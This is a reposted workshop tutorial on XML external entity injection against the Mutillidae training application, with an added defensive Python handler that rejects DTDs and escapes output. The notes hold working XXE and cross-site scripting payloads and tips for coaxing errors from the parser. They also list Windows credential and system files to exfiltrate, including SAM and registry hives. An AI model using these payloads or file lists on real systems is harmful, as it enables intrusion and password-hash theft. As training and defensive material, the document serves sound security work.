Nytro

Video Tutorial: Introduction to XML External Entity Injection


Video Tutorial: Introduction to XML External Entity Injection

Posted by webpwnized in Information Security on Sep 12, 2013 9:01:16 AM

Author: webpwnized

From: ISSA KY Sept 2013 Workshop (Louisville, KY)

Twitter: @webpwnized

This video introduces XML injection to achieve XML external entity injection (XXE) and XML based cross site scripting (XSS). Please find notes used/mentioned in video posted below the video.

1. What is XML injection

2. What is an "entity"

3. What is entity injection

4. Cross site scripting with entity injection

5. Determining local execution path

6. Determining privileges of "user"

7. Directory traversal

8. file:/// protocol

9. Local File Inclusion with entity injection

Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox

Basics

<?xml version="1.0"?><change-log><text>Hello World</text></change-log>

<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote '"'> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>

Information Disclosure

C:\xampp\htdocs\mutillidae\xml-validator.php

file:///C:/xampp/htdocs/mutillidae/xml-validator.php

Try to cause various errors in order to coax information from XML parser

Try to load files that don't exist

Put whitespace before the XML

Send malformed XML

Determine operating system type and the path at which interpretation is taking place

Cross site scripting

<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change-log>

<?xml version="1.0"?><change-log><text><script>alert("Hello World")</script></text></change-log>

Local File Inclusion

Try to acquire application configuration files and/or source code files

Try to acquire operating system files

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>

Remote File Inclusion

<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>

Windows XP SP3

%WINDIR% = C:\WINDOWS

%SYSTEMDRIVE% = C:

%SYSTEMROOT% = C:\WINDOWS

Credit: Rob "Mubix" Fuller

file:///C:\WINDOWS\System32\drivers\etc\hosts

%WINDIR%\System32\drivers\etc\hosts

Blind Files

%SYSTEMDRIVE%\boot.ini

A file that can be counted on to be on virtually every Windows host. Helps with confirmation that a read is happening.

%WINDIR%\win.ini

This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow Copy methods.

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\RegBack\system

Files To Pull (if possible)

%SYSTEMDRIVE%\pagefile.sys

Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size

%WINDIR%\debug\NetSetup.log

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software

%WINDIR%\repair\security

%WINDIR%\iis6.log (5, 6 or 7)

%WINDIR%\system32\logfiles\httperr\httperr1.log

IIS 6 error log

%SystemDrive%\inetpub\logs\LogFiles

IIS 7’s logs location

%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log

%USERPROFILE%\ntuser.dat

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

%WINDIR%\System32\drivers\etc\hosts

Source: https://community.rapid7.com/community/infosec/blog/2013/09/12/video-tutorial-introduction-to-xml-external-entity-injection
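The notes above show, from the tester's side, what an XML parser does with internal entities, SYSTEM entities pointing at file:/// or http://, leading whitespace, malformed input, and script tags reflected into a page. As an added example (not code from the video, from Mutillidae, or from the PHP app in the diagram), the following Python handler shows the receiving side done defensively for the same <change-log> documents: it refuses any DTD before the bytes reach the parser, so no entity of either kind is ever resolved, it never echoes the parser's own error text (which is where the local path and OS details in the "Information Disclosure" section come from), and it HTML-escapes everything it reflects. The document shape (<change-log><text>...</text></change-log>) is taken from the notes; the function names and messages are my own.

```python
# Added example: a hardened receiver for the <change-log> documents used in the
# notes above. Not part of the original tutorial or of Mutillidae.
import html
import re
import xml.etree.ElementTree as ET

# Any DOCTYPE or ENTITY declaration anywhere in the input is grounds for
# rejection. The pattern is case-insensitive and tolerates odd spacing so that
# a leading BOM or whitespace (which the notes suggest trying) does not help.
_DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when the submitted document tries to declare a DTD."""


def extract_text(raw: bytes) -> str:
    """Parse a <change-log> document and return the contents of its <text>.

    Because any document carrying a DTD is rejected before parsing, neither
    internal entities (&myEntity;) nor SYSTEM entities (file:///..., http://...)
    can be declared, so nothing is expanded or fetched. A DTD-less document can
    only reference the five predefined entities (&lt; &gt; &amp; &quot; &apos;).
    """
    if _DTD_MARKER.search(raw):
        raise UnsafeXML("DTD/entity declarations are not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        # Deliberately drop the parser's message: it can carry line/column
        # detail and, in some stacks, the local path of the script, which is
        # exactly the information the "Information Disclosure" notes go after.
        raise ValueError("malformed XML") from None
    if root.tag != "change-log":
        raise ValueError("unexpected root element")
    node = root.find("text")
    # itertext() flattens nested children such as <script>...</script> into
    # plain text; the tags themselves never reach the output.
    return "".join(node.itertext()) if node is not None else ""


def render_html(raw: bytes) -> str:
    """Build the HTML fragment sent back to the client.

    Every reflected string, including the rejection reason, goes through
    html.escape(), so the <script> payloads from the "Cross site scripting"
    section come back as inert text.
    """
    try:
        text = extract_text(raw)
    except ValueError as exc:
        # Generic wording for the client; the full exception belongs in a
        # server-side log, not in the response.
        return "<p>Request rejected: %s</p>" % html.escape(str(exc))
    return "<p>%s</p>" % html.escape(text, quote=True)


if __name__ == "__main__":
    # Constructed inputs mirroring the payloads in the notes above.
    samples = [
        b'<?xml version="1.0"?><change-log><text>Hello World</text></change-log>',
        b'<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]>'
        b'<change-log><text>Hello &myEntity;</text></change-log>',
        b'<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]>'
        b'<change-log><text>&systemEntity;</text></change-log>',
        b'   <?xml version="1.0"?><change-log><text>leading whitespace</text></change-log>',
        b'<?xml version="1.0"?><change-log><text><script>alert("Hello World")</script></text></change-log>',
    ]
    for doc in samples:
        print(render_html(doc))
```

The DTD check runs on the raw bytes rather than relying on parser options because the safe settings differ from library to library (and PHP's older libxml defaults resolved external entities); rejecting the declaration outright makes the behaviour independent of which parser sits behind the endpoint. In a real deployment the rejection reason would also be logged with the source address, since a DOCTYPE in user-supplied XML is a reliable detection signal for the probing described in these notes.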
